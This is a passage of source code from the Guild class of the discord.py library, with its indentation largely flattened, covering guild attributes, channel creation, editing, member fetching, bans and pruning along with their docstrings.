self.default_notifications = try_enum(NotificationLevel, guild.get('default_message_notifications'))
self.explicit_content_filter = try_enum(ContentFilter, guild.get('explicit_content_filter', 0))
self.afk_timeout = guild.get('afk_timeout')
self.icon = guild.get('icon')
self.banner = guild.get('banner')
self.unavailable = guild.get('unavailable', False)
self.id = int(guild['id'])
self._roles = {}
state = self._state # speed up attribute access
for r in guild.get('roles', []):
role = Role(guild=self, data=r, state=state)
self._roles[role.id] = role
self.mfa_level = guild.get('mfa_level')
self.emojis = tuple(map(lambda d: state.store_emoji(self, d), guild.get('emojis', [])))
self.features = guild.get('features', [])
self.splash = guild.get('splash')
self._system_channel_id = utils._get_as_snowflake(guild, 'system_channel_id')
self.description = guild.get('description')
self.max_presences = guild.get('max_presences')
self.max_members = guild.get('max_members')
self.max_video_channel_users = guild.get('max_video_channel_users')
self.premium_tier = guild.get('premium_tier', 0)
self.premium_subscription_count = guild.get('premium_subscription_count') or 0
self._system_channel_flags = guild.get('system_channel_flags', 0)
self.preferred_locale = guild.get('preferred_locale')
self.discovery_splash = guild.get('discovery_splash')
self._rules_channel_id = utils._get_as_snowflake(guild, 'rules_channel_id')
self._public_updates_channel_id = utils._get_as_snowflake(guild, 'public_updates_channel_id')
cache_joined = self._state.member_cache_flags.joined
self_id = self._state.self_id
for mdata in guild.get('members', []):
member = Member(data=mdata, guild=self, state=state)
if cache_joined or member.id == self_id:
self._add_member(member)
self._sync(guild)
self._large = None if member_count is None else self._member_count >= 250
self.owner_id = utils._get_as_snowflake(guild, 'owner_id')
self.afk_channel = self.get_channel(utils._get_as_snowflake(guild, 'afk_channel_id'))
for obj in guild.get('voice_states', []):
self._update_voice_state(obj, int(obj['channel_id']))
def _sync(self, data):
try:
self._large = data['large']
except KeyError:
pass
empty_tuple = tuple()
for presence in data.get('presences', []):
user_id = int(presence['user']['id'])
member = self.get_member(user_id)
if member is not None:
member._presence_update(presence, empty_tuple)
if 'channels' in data:
channels = data['channels']
for c in channels:
factory, ch_type = _channel_factory(c['type'])
if factory:
self._add_channel(factory(guild=self, data=c, state=self._state))
@property
def channels(self):
"""List[:class:`abc.GuildChannel`]: A list of channels that belongs to this guild."""
return list(self._channels.values())
@property
def large(self):
""":class:`bool`: Indicates if the guild is a 'large' guild.
A large guild is defined as having more than ``large_threshold`` count
members, which for this library is set to the maximum of 250.
"""
if self._large is None:
try:
return self._member_count >= 250
except AttributeError:
return len(self._members) >= 250
return self._large
@property
def voice_channels(self):
"""List[:class:`VoiceChannel`]: A list of voice channels that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, VoiceChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def stage_channels(self):
"""List[:class:`StageChannel`]: A list of voice channels that belongs to this guild.
.. versionadded:: 1.7
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, StageChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def me(self):
""":class:`Member`: Similar to :attr:`Client.user` except an instance of :class:`Member`.
This is essentially used to get the member version of yourself.
"""
self_id = self._state.user.id
return self.get_member(self_id)
@property
def voice_client(self):
"""Optional[:class:`VoiceProtocol`]: Returns the :class:`VoiceProtocol` associated with this guild, if any."""
return self._state._get_voice_client(self.id)
@property
def text_channels(self):
"""List[:class:`TextChannel`]: A list of text channels that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, TextChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def categories(self):
"""List[:class:`CategoryChannel`]: A list of categories that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, CategoryChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
def by_category(self):
"""Returns every :class:`CategoryChannel` and their associated channels.
These channels and categories are sorted in the official Discord UI order.
If the channels do not have a category, then the first element of the tuple is
``None``.
Returns
--------
List[Tuple[Optional[:class:`CategoryChannel`], List[:class:`abc.GuildChannel`]]]:
The categories and their associated channels.
"""
grouped = {}
for channel in self._channels.values():
if isinstance(channel, CategoryChannel):
grouped.setdefault(channel.id, [])
continue
try:
grouped[channel.category_id].append(channel)
except KeyError:
grouped[channel.category_id] = [channel]
def key(t):
k, v = t
return ((k.position, k.id) if k else (-1, -1), v)
_get = self._channels.get
as_list = [(_get(k), v) for k, v in grouped.items()]
as_list.sort(key=key)
for _, channels in as_list:
channels.sort(key=lambda c: (c._sorting_bucket, c.position, c.id))
return as_list
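    # Illustrative sketch (comment only, added): iterating the result of
    # by_category(), assuming ``guild`` is an existing Guild instance.
    #
    #     for category, channels in guild.by_category():
    #         label = category.name if category else 'uncategorised'
    #         print(label, [c.name for c in channels])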
def get_channel(self, channel_id):
"""Returns a channel with the given ID.
Parameters
-----------
channel_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`.abc.GuildChannel`]
The returned channel or ``None`` if not found.
"""
return self._channels.get(channel_id)
@property
def system_channel(self):
"""Optional[:class:`TextChannel`]: Returns the guild's channel used for system messages.
If no channel is set, then this returns ``None``.
"""
channel_id = self._system_channel_id
return channel_id and self._channels.get(channel_id)
@property
def system_channel_flags(self):
""":class:`SystemChannelFlags`: Returns the guild's system channel settings."""
return SystemChannelFlags._from_value(self._system_channel_flags)
@property
def rules_channel(self):
"""Optional[:class:`TextChannel`]: Return's the guild's channel used for the rules.
The guild must be a Community guild.
If no channel is set, then this returns ``None``.
.. versionadded:: 1.3
"""
channel_id = self._rules_channel_id
return channel_id and self._channels.get(channel_id)
@property
def public_updates_channel(self):
"""Optional[:class:`TextChannel`]: Return's the guild's channel where admins and
moderators of the guilds receive notices from Discord. The guild must be a
Community guild.
If no channel is set, then this returns ``None``.
.. versionadded:: 1.4
"""
channel_id = self._public_updates_channel_id
return channel_id and self._channels.get(channel_id)
@property
def emoji_limit(self):
""":class:`int`: The maximum number of emoji slots this guild has."""
more_emoji = 200 if 'MORE_EMOJI' in self.features else 50
return max(more_emoji, self._PREMIUM_GUILD_LIMITS[self.premium_tier].emoji)
@property
def bitrate_limit(self):
""":class:`float`: The maximum bitrate for voice channels this guild can have."""
vip_guild = self._PREMIUM_GUILD_LIMITS[1].bitrate if 'VIP_REGIONS' in self.features else 96e3
return max(vip_guild, self._PREMIUM_GUILD_LIMITS[self.premium_tier].bitrate)
@property
def filesize_limit(self):
""":class:`int`: The maximum number of bytes files can have when uploaded to this guild."""
return self._PREMIUM_GUILD_LIMITS[self.premium_tier].filesize
@property
def members(self):
"""List[:class:`Member`]: A list of members that belong to this guild."""
return list(self._members.values())
def get_member(self, user_id):
"""Returns a member with the given ID.
Parameters
-----------
user_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`Member`]
The member or ``None`` if not found.
"""
return self._members.get(user_id)
@property
def premium_subscribers(self):
"""List[:class:`Member`]: A list of members who have "boosted" this guild."""
return [member for member in self.members if member.premium_since is not None]
@property
def roles(self):
"""List[:class:`Role`]: Returns a :class:`list` of the guild's roles in hierarchy order.
The first element of this list will be the lowest role in the
hierarchy.
"""
return sorted(self._roles.values())
def get_role(self, role_id):
"""Returns a role with the given ID.
Parameters
-----------
role_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`Role`]
The role or ``None`` if not found.
"""
return self._roles.get(role_id)
@property
def default_role(self):
""":class:`Role`: Gets the @everyone role that all members have by default."""
return self.get_role(self.id)
@property
def premium_subscriber_role(self):
"""Optional[:class:`Role`]: Gets the premium subscriber role, AKA "boost" role, in this guild.
.. versionadded:: 1.6
"""
for role in self._roles.values():
if role.is_premium_subscriber():
return role
return None
@property
def self_role(self):
"""Optional[:class:`Role`]: Gets the role associated with this client's user, if any.
.. versionadded:: 1.6
"""
self_id = self._state.self_id
for role in self._roles.values():
tags = role.tags
if tags and tags.bot_id == self_id:
return role
return None
@property
def owner(self):
"""Optional[:class:`Member`]: The member that owns the guild."""
return self.get_member(self.owner_id)
@property
def icon_url(self):
""":class:`Asset`: Returns the guild's icon asset."""
return self.icon_url_as()
def is_icon_animated(self):
""":class:`bool`: Returns True if the guild has an animated icon."""
return bool(self.icon and self.icon.startswith('a_'))
def icon_url_as(self, *, format=None, static_format='webp', size=1024):
"""Returns an :class:`Asset` for the guild's icon.
The format must be one of 'webp', 'jpeg', 'jpg', 'png' or 'gif', and
'gif' is only valid for animated avatars. The size must be a power of 2
between 16 and 4096.
Parameters
-----------
format: Optional[:class:`str`]
The format to attempt to convert the icon to.
If the format is ``None``, then it is automatically
detected into either 'gif' or static_format depending on the
icon being animated or not.
static_format: Optional[:class:`str`]
Format to attempt to convert only non-animated icons to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_icon(self._state, self, format=format, static_format=static_format, size=size)
@property
def banner_url(self):
""":class:`Asset`: Returns the guild's banner asset."""
return self.banner_url_as()
def banner_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's banner.
The format must be one of 'webp', 'jpeg', or 'png'. The
size must be a power of 2 between 16 and 4096.
Parameters
-----------
format: :class:`str`
The format to attempt to convert the banner to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.banner, 'banners', format=format, size=size)
@property
def splash_url(self):
""":class:`Asset`: Returns the guild's invite splash asset."""
return self.splash_url_as()
def splash_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's invite splash.
The format must be one of 'webp', 'jpeg', 'jpg', or 'png'. The
size must be a power of 2 between 16 and 4096.
Parameters
-----------
format: :class:`str`
The format to attempt to convert the splash to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.splash, 'splashes', format=format, size=size)
@property
def discovery_splash_url(self):
""":class:`Asset`: Returns the guild's discovery splash asset.
.. versionadded:: 1.3
"""
return self.discovery_splash_url_as()
def discovery_splash_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's discovery splash.
The format must be one of 'webp', 'jpeg', 'jpg', or 'png'. The
size must be a power of 2 between 16 and 4096.
.. versionadded:: 1.3
Parameters
-----------
format: :class:`str`
The format to attempt to convert the splash to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.discovery_splash, 'discovery-splashes', format=format, size=size)
@property
def member_count(self):
""":class:`int`: Returns the true member count regardless of it being loaded fully or not.
.. warning::
Due to a Discord limitation, in order for this attribute to remain up-to-date and
accurate, it requires :attr:`Intents.members` to be specified.
"""
return self._member_count
@property
def chunked(self):
""":class:`bool`: Returns a boolean indicating if the guild is "chunked".
A chunked guild means that :attr:`member_count` is equal to the
number of members stored in the internal :attr:`members` cache.
If this value returns ``False``, then you should request for
offline members.
"""
count = getattr(self, '_member_count', None)
if count is None:
return False
return count == len(self._members)
@property
def shard_id(self):
""":class:`int`: Returns the shard ID for this guild if applicable."""
count = self._state.shard_count
if count is None:
return None
return (self.id >> 22) % count
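    # Added note: this mirrors Discord's documented sharding formula, the
    # timestamp portion of the snowflake (id >> 22) taken modulo the shard
    # count, so every event for a given guild is routed to the same shard.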
@property
def created_at(self):
""":class:`datetime.datetime`: Returns the guild's creation time in UTC."""
return utils.snowflake_time(self.id)
def get_member_named(self, name):
"""Returns the first member found that matches the name provided.
The name can have an optional discriminator argument, e.g. "Jake#0001"
or "Jake" will both do the lookup. However the former will give a more
precise result. Note that the discriminator must have all 4 digits
for this to work.
If a nickname is passed, then it is looked up via the nickname. Note
however, that a nickname + discriminator combo will not lookup the nickname
but rather the username + discriminator combo due to nickname + discriminator
not being unique.
If no member is found, ``None`` is returned.
Parameters
-----------
name: :class:`str`
The name of the member to lookup with an optional discriminator.
Returns
--------
Optional[:class:`Member`]
The member in this guild with the associated name. If not found
then ``None`` is returned.
"""
result = None
members = self.members
if len(name) > 5 and name[-5] == '#':
# The 5 length is checking to see if #0000 is in the string,
# as a#0000 has a length of 6, the minimum for a potential
# discriminator lookup.
potential_discriminator = name[-4:]
# do the actual lookup and return if found
# if it isn't found then we'll do a full name lookup below.
result = utils.get(members, name=name[:-5], discriminator=potential_discriminator)
if result is not None:
return result
def pred(m):
return m.nick == name or m.name == name
return utils.find(pred, members)
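    # Illustrative sketch (comment only, added): the two lookup styles accepted
    # by get_member_named(), using made-up names.
    #
    #     member = guild.get_member_named('Jake#0001')  # username#discriminator
    #     member = guild.get_member_named('Jake')       # username or nickname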
def _create_channel(self, name, overwrites, channel_type, category=None, **options):
if overwrites is None:
overwrites = {}
elif not isinstance(overwrites, dict):
raise InvalidArgument('overwrites parameter expects a dict.')
perms = []
for target, perm in overwrites.items():
if not isinstance(perm, PermissionOverwrite):
                raise InvalidArgument(f'Expected PermissionOverwrite, received {perm.__class__.__name__}')
allow, deny = perm.pair()
payload = {
'allow': allow.value,
'deny': deny.value,
'id': target.id
}
if isinstance(target, Role):
payload['type'] = abc._Overwrites.ROLE
else:
payload['type'] = abc._Overwrites.MEMBER
perms.append(payload)
try:
options['rate_limit_per_user'] = options.pop('slowmode_delay')
except KeyError:
pass
try:
rtc_region = options.pop('rtc_region')
except KeyError:
pass
else:
options['rtc_region'] = None if rtc_region is None else str(rtc_region)
parent_id = category.id if category else None
return self._state.http.create_channel(self.id, channel_type.value, name=name, parent_id=parent_id,
permission_overwrites=perms, **options)
async def create_text_channel(self, name, *, overwrites=None, category=None, reason=None, **options):
"""|coro|
Creates a :class:`TextChannel` for the guild.
Note that you need the :attr:`~Permissions.manage_channels` permission
to create the channel.
The ``overwrites`` parameter can be used to create a 'secret'
channel upon creation. This parameter expects a :class:`dict` of
overwrites with the target (either a :class:`Member` or a :class:`Role`)
as the key and a :class:`PermissionOverwrite` as the value.
.. note::
Creating a channel of a specified position will not update the position of
other channels to follow suit. A follow-up call to :meth:`~TextChannel.edit`
will be required to update the position of the channel in the channel list.
Examples
----------
Creating a basic channel:
.. code-block:: python3
channel = await guild.create_text_channel('cool-channel')
Creating a "secret" channel:
.. code-block:: python3
overwrites = {
guild.default_role: discord.PermissionOverwrite(read_messages=False),
guild.me: discord.PermissionOverwrite(read_messages=True)
}
channel = await guild.create_text_channel('secret', overwrites=overwrites)
Parameters
-----------
name: :class:`str`
The channel's name.
overwrites
A :class:`dict` of target (either a role or a member) to
:class:`PermissionOverwrite` to apply upon creation of a channel.
Useful for creating secret channels.
category: Optional[:class:`CategoryChannel`]
The category to place the newly created channel under.
The permissions will be automatically synced to category if no
overwrites are provided.
position: :class:`int`
The position in the channel list. This is a number that starts
at 0. e.g. the top channel is position 0.
topic: Optional[:class:`str`]
The new channel's topic.
slowmode_delay: :class:`int`
Specifies the slowmode rate limit for user in this channel, in seconds.
The maximum value possible is `21600`.
nsfw: :class:`bool`
To mark the channel as NSFW or not.
reason: Optional[:class:`str`]
The reason for creating this channel. Shows up on the audit log.
Raises
-------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`TextChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.text, category, reason=reason, **options)
channel = TextChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_voice_channel(self, name, *, overwrites=None, category=None, reason=None, **options):
"""|coro|
This is similar to :meth:`create_text_channel` except makes a :class:`VoiceChannel` instead, in addition
to having the following new parameters.
Parameters
-----------
bitrate: :class:`int`
The channel's preferred audio bitrate in bits per second.
user_limit: :class:`int`
The channel's limit for number of members that can be in a voice channel.
rtc_region: Optional[:class:`VoiceRegion`]
The region for the voice channel's voice communication.
A value of ``None`` indicates automatic voice region detection.
.. versionadded:: 1.7
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`VoiceChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.voice, category, reason=reason, **options)
channel = VoiceChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_stage_channel(self, name, *, topic=None, category=None, overwrites=None, reason=None, position=None):
"""|coro|
This is similar to :meth:`create_text_channel` except makes a :class:`StageChannel` instead.
.. note::
The ``slowmode_delay`` and ``nsfw`` parameters are not supported in this function.
.. versionadded:: 1.7
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`StageChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.stage_voice, category, reason=reason, position=position, topic=topic)
channel = StageChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_category(self, name, *, overwrites=None, reason=None, position=None):
"""|coro|
Same as :meth:`create_text_channel` except makes a :class:`CategoryChannel` instead.
.. note::
The ``category`` parameter is not supported in this function since categories
cannot have categories.
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`CategoryChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.category, reason=reason, position=position)
channel = CategoryChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
create_category_channel = create_category
async def leave(self):
"""|coro|
Leaves the guild.
.. note::
You cannot leave the guild that you own, you must delete it instead
via :meth:`delete`.
Raises
--------
HTTPException
Leaving the guild failed.
"""
await self._state.http.leave_guild(self.id)
async def delete(self):
"""|coro|
Deletes the guild. You must be the guild owner to delete the
guild.
Raises
--------
HTTPException
Deleting the guild failed.
Forbidden
You do not have permissions to delete the guild.
"""
await self._state.http.delete_guild(self.id)
async def edit(self, *, reason=None, **fields):
"""|coro|
Edits the guild.
You must have the :attr:`~Permissions.manage_guild` permission
to edit the guild.
.. versionchanged:: 1.4
The `rules_channel` and `public_updates_channel` keyword-only parameters were added.
Parameters
----------
name: :class:`str`
The new name of the guild.
description: :class:`str`
The new description of the guild. This is only available to guilds that
contain ``PUBLIC`` in :attr:`Guild.features`.
icon: :class:`bytes`
            A :term:`py:bytes-like object` representing the icon. Only PNG/JPEG is supported.
            GIF is only available to guilds that contain ``ANIMATED_ICON`` in :attr:`Guild.features`.
Could be ``None`` to denote removal of the icon.
banner: :class:`bytes`
A :term:`py:bytes-like object` representing the banner.
Could be ``None`` to denote removal of the banner.
splash: :class:`bytes`
A :term:`py:bytes-like object` representing the invite splash.
Only PNG/JPEG supported. Could be ``None`` to denote removing the
splash. This is only available to guilds that contain ``INVITE_SPLASH``
in :attr:`Guild.features`.
region: :class:`VoiceRegion`
The new region for the guild's voice communication.
afk_channel: Optional[:class:`VoiceChannel`]
The new channel that is the AFK channel. Could be ``None`` for no AFK channel.
afk_timeout: :class:`int`
The number of seconds until someone is moved to the AFK channel.
owner: :class:`Member`
The new owner of the guild to transfer ownership to. Note that you must
be owner of the guild to do this.
verification_level: :class:`VerificationLevel`
The new verification level for the guild.
default_notifications: :class:`NotificationLevel`
The new default notification level for the guild.
explicit_content_filter: :class:`ContentFilter`
The new explicit content filter for the guild.
vanity_code: :class:`str`
The new vanity code for the guild.
system_channel: Optional[:class:`TextChannel`]
The new channel that is used for the system channel. Could be ``None`` for no system channel.
system_channel_flags: :class:`SystemChannelFlags`
The new system channel settings to use with the new system channel.
preferred_locale: :class:`str`
The new preferred locale for the guild. Used as the primary language in the guild.
If set, this must be an ISO 639 code, e.g. ``en-US`` or ``ja`` or ``zh-CN``.
rules_channel: Optional[:class:`TextChannel`]
The new channel that is used for rules. This is only available to
guilds that contain ``PUBLIC`` in :attr:`Guild.features`. Could be ``None`` for no rules
channel.
public_updates_channel: Optional[:class:`TextChannel`]
The new channel that is used for public updates from Discord. This is only available to
guilds that contain ``PUBLIC`` in :attr:`Guild.features`. Could be ``None`` for no
public updates channel.
reason: Optional[:class:`str`]
The reason for editing this guild. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to edit the guild.
HTTPException
Editing the guild failed.
InvalidArgument
The image format passed in to ``icon`` is invalid. It must be
PNG or JPG. This is also raised if you are not the owner of the
guild and request an ownership transfer.
"""
http = self._state.http
try:
icon_bytes = fields['icon']
except KeyError:
icon = self.icon
else:
if icon_bytes is not None:
icon = utils._bytes_to_base64_data(icon_bytes)
else:
icon = None
try:
banner_bytes = fields['banner']
except KeyError:
banner = self.banner
else:
if banner_bytes is not None:
banner = utils._bytes_to_base64_data(banner_bytes)
else:
banner = None
try:
vanity_code = fields['vanity_code']
except KeyError:
pass
else:
await http.change_vanity_code(self.id, vanity_code, reason=reason)
try:
splash_bytes = fields['splash']
except KeyError:
splash = self.splash
else:
if splash_bytes is not None:
splash = utils._bytes_to_base64_data(splash_bytes)
else:
splash = None
fields['icon'] = icon
fields['banner'] = banner
fields['splash'] = splash
default_message_notifications = fields.get('default_notifications', self.default_notifications)
if not isinstance(default_message_notifications, NotificationLevel):
raise InvalidArgument('default_notifications field must be of type NotificationLevel')
fields['default_message_notifications'] = default_message_notifications.value
try:
afk_channel = fields.pop('afk_channel')
except KeyError:
pass
else:
if afk_channel is None:
fields['afk_channel_id'] = afk_channel
else:
fields['afk_channel_id'] = afk_channel.id
try:
system_channel = fields.pop('system_channel')
except KeyError:
pass
else:
if system_channel is None:
fields['system_channel_id'] = system_channel
else:
fields['system_channel_id'] = system_channel.id
if 'owner' in fields:
if self.owner_id != self._state.self_id:
raise InvalidArgument('To transfer ownership you must be the owner of the guild.')
fields['owner_id'] = fields['owner'].id
if 'region' in fields:
fields['region'] = str(fields['region'])
level = fields.get('verification_level', self.verification_level)
if not isinstance(level, VerificationLevel):
raise InvalidArgument('verification_level field must be of type VerificationLevel')
fields['verification_level'] = level.value
explicit_content_filter = fields.get('explicit_content_filter', self.explicit_content_filter)
if not isinstance(explicit_content_filter, ContentFilter):
raise InvalidArgument('explicit_content_filter field must be of type ContentFilter')
fields['explicit_content_filter'] = explicit_content_filter.value
system_channel_flags = fields.get('system_channel_flags', self.system_channel_flags)
if not isinstance(system_channel_flags, SystemChannelFlags):
raise InvalidArgument('system_channel_flags field must be of type SystemChannelFlags')
fields['system_channel_flags'] = system_channel_flags.value
try:
rules_channel = fields.pop('rules_channel')
except KeyError:
pass
else:
if rules_channel is None:
fields['rules_channel_id'] = rules_channel
else:
fields['rules_channel_id'] = rules_channel.id
try:
public_updates_channel = fields.pop('public_updates_channel')
except KeyError:
pass
else:
if public_updates_channel is None:
fields['public_updates_channel_id'] = public_updates_channel
else:
fields['public_updates_channel_id'] = public_updates_channel.id
await http.edit_guild(self.id, reason=reason, **fields)
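    # Illustrative sketch (comment only, added): a typical edit() call. It must
    # be awaited from a coroutine and requires the manage_guild permission.
    #
    #     await guild.edit(name='New guild name', reason='Rebranding')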
async def fetch_channels(self):
"""|coro|
Retrieves all :class:`abc.GuildChannel` that the guild has.
.. note::
This method is an API call. For general usage, consider :attr:`channels` instead.
.. versionadded:: 1.2
Raises
-------
InvalidData
An unknown channel type was received from Discord.
HTTPException
Retrieving the channels failed.
Returns
-------
List[:class:`abc.GuildChannel`]
All channels in the guild.
"""
data = await self._state.http.get_all_guild_channels(self.id)
def convert(d):
factory, ch_type = _channel_factory(d['type'])
if factory is None:
                raise InvalidData('Unknown channel type {type} for channel ID {id}.'.format_map(d))
channel = factory(guild=self, state=self._state, data=d)
return channel
return [convert(d) for d in data]
def fetch_members(self, *, limit=1000, after=None):
"""Retrieves an :class:`.AsyncIterator` that enables receiving the guild's members. In order to use this,
:meth:`Intents.members` must be enabled.
.. note::
This method is an API call. For general usage, consider :attr:`members` instead.
.. versionadded:: 1.3
All parameters are optional.
Parameters
----------
limit: Optional[:class:`int`]
The number of members to retrieve. Defaults to 1000.
Pass ``None`` to fetch all members. Note that this is potentially slow.
after: Optional[Union[:class:`.abc.Snowflake`, :class:`datetime.datetime`]]
Retrieve members after this date or object.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
Raises
------
ClientException
The members intent is not enabled.
HTTPException
Getting the members failed.
Yields
------
:class:`.Member`
The member with the member data parsed.
Examples
--------
Usage ::
async for member in guild.fetch_members(limit=150):
print(member.name)
Flattening into a list ::
members = await guild.fetch_members(limit=150).flatten()
# members is now a list of Member...
"""
if not self._state._intents.members:
raise ClientException('Intents.members must be enabled to use this.')
return MemberIterator(self, limit=limit, after=after)
async def fetch_member(self, member_id):
"""|coro|
Retrieves a :class:`Member` from a guild ID, and a member ID.
.. note::
This method is an API call. For general usage, consider :meth:`get_member` instead.
Parameters
-----------
member_id: :class:`int`
The member's ID to fetch from.
Raises
-------
Forbidden
You do not have access to the guild.
HTTPException
Fetching the member failed.
Returns
--------
:class:`Member`
The member from the member ID.
"""
data = await self._state.http.get_member(self.id, member_id)
return Member(data=data, state=self._state, guild=self)
async def fetch_ban(self, user):
"""|coro|
Retrieves the :class:`BanEntry` for a user.
You must have the :attr:`~Permissions.ban_members` permission
to get this information.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to get ban information from.
Raises
------
Forbidden
You do not have proper permissions to get the information.
NotFound
This user is not banned.
HTTPException
An error occurred while fetching the information.
Returns
-------
:class:`BanEntry`
The :class:`BanEntry` object for the specified user.
"""
data: BanPayload = await self._state.http.get_ban(user.id, self.id)
return BanEntry(
user=User(state=self._state, data=data['user']),
reason=data['reason']
)
async def bans(self):
"""|coro|
Retrieves all the users that are banned from the guild as a :class:`list` of :class:`BanEntry`.
You must have the :attr:`~Permissions.ban_members` permission
to get this information.
Raises
-------
Forbidden
You do not have proper permissions to get the information.
HTTPException
An error occurred while fetching the information.
Returns
--------
List[:class:`BanEntry`]
A list of :class:`BanEntry` objects.
"""
data: List[BanPayload] = await self._state.http.get_bans(self.id)
return [BanEntry(user=User(state=self._state, data=e['user']),
reason=e['reason'])
for e in data]
async def prune_members(self, *, days, compute_prune_count=True, roles=None, reason=None):
r"""|coro|
Prunes the guild from its inactive members.
The inactive members are denoted if they have not logged on in
``days`` number of days and they have no roles.
You must have the :attr:`~Permissions.kick_members` permission
to use this.
To check how many members you would prune without actually pruning,
see the :meth:`estimate_pruned_members` function.
To prune members that have specific roles see the ``roles`` parameter.
.. versionchanged:: 1.4
The ``roles`` keyword-only parameter was added.
Parameters
-----------
days: :class:`int`
The number of days before counting as inactive.
reason: Optional[:class:`str`]
The reason for doing this action. Shows up on the audit log.
compute_prune_count: :class:`bool`
Whether to compute the prune count. This defaults to ``True``
which makes it prone to timeouts in very large guilds. In order
to prevent timeouts, you must set this to ``False``. If this is
set to ``False``\, then this function will always return ``None``.
roles: Optional[List[:class:`abc.Snowflake`]]
A list of :class:`abc.Snowflake` that represent roles to include in the pruning process. If a member
has a role that is not specified, they'll be excluded.
Raises
-------
Forbidden
You do not have permissions to prune members.
HTTPException
An error occurred while pruning members.
InvalidArgument
An integer was not passed for ``days``.
Returns
---------
Optional[:class:`int`]
The number of members pruned. If ``compute_prune_count`` is ``False``
then this returns ``None``.
"""
if not isinstance(days, int):
raise InvalidArgument(f'Expected int for ``days``, received {days.__class__.__name__} instead.')
if roles:
roles = [str(role.id) for role in roles]
data = await self._state.http.prune_members(self.id, days, compute_prune_count=compute_prune_count, roles=roles, reason=reason)
return data['pruned']
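    # Illustrative usage sketch (editor's note, not part of discord.py): pruning with a
    # role filter, and skipping the count in very large guilds to avoid timeouts.
    #
    #     pruned = await guild.prune_members(days=30, roles=[inactive_role], reason='Routine cleanup')
    #     await guild.prune_members(days=30, compute_prune_count=False)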
async def templates(self):
"""|coro|
Gets the list of templates from this guild.
Requires :attr:`~.Permissions.manage_guild` permissions.
.. versionadded:: 1.7
Raises
-------
Forbidden
You don't have permissions to get the templates.
Returns
--------
List[:class:`Template`]
The templates for this guild.
"""
from .template import Template
data = await self._state.http.guild_templates(self.id)
return [Template(data=d, state=self._state) for d in data]
async def webhooks(self):
"""|coro|
Gets the list of webhooks from this guild.
Requires :attr:`~.Permissions.manage_webhooks` permissions.
Raises
-------
Forbidden
You don't have permissions to get the webhooks.
Returns
--------
List[:class:`Webhook`]
The webhooks for this guild.
"""
from .webhook import Webhook
data = await self._state.http.guild_webhooks(self.id)
return [Webhook.from_state(d, state=self._state) for d in data]
async def estimate_pruned_members(self, *, days, roles=None):
"""|coro|
Similar to :meth:`prune_members` except instead of actually
pruning members, it returns how many members it would prune
from the guild had it been called.
Parameters
-----------
days: :class:`int`
The number of days before counting as inactive.
roles: Optional[List[:class:`abc.Snowflake`]]
A list of :class:`abc.Snowflake` that represent roles to include in the estimate. If a member
has a role that is not specified, they'll be excluded.
.. versionadded:: 1.7
Raises
-------
Forbidden
You do not have permissions to prune members.
HTTPException
An error occurred while fetching the prune members estimate.
InvalidArgument
An integer was not passed for ``days``.
Returns
---------
:class:`int`
The number of members estimated to be pruned.
"""
if not isinstance(days, int):
raise InvalidArgument(f'Expected int for ``days``, received {days.__class__.__name__} instead.')
if roles:
roles = [str(role.id) for role in roles]
data = await self._state.http.estimate_pruned_members(self.id, days, roles)
return data['pruned']
async def invites(self) -> List[Invite]:
"""|coro|
Returns a list of all active instant invites from the guild.
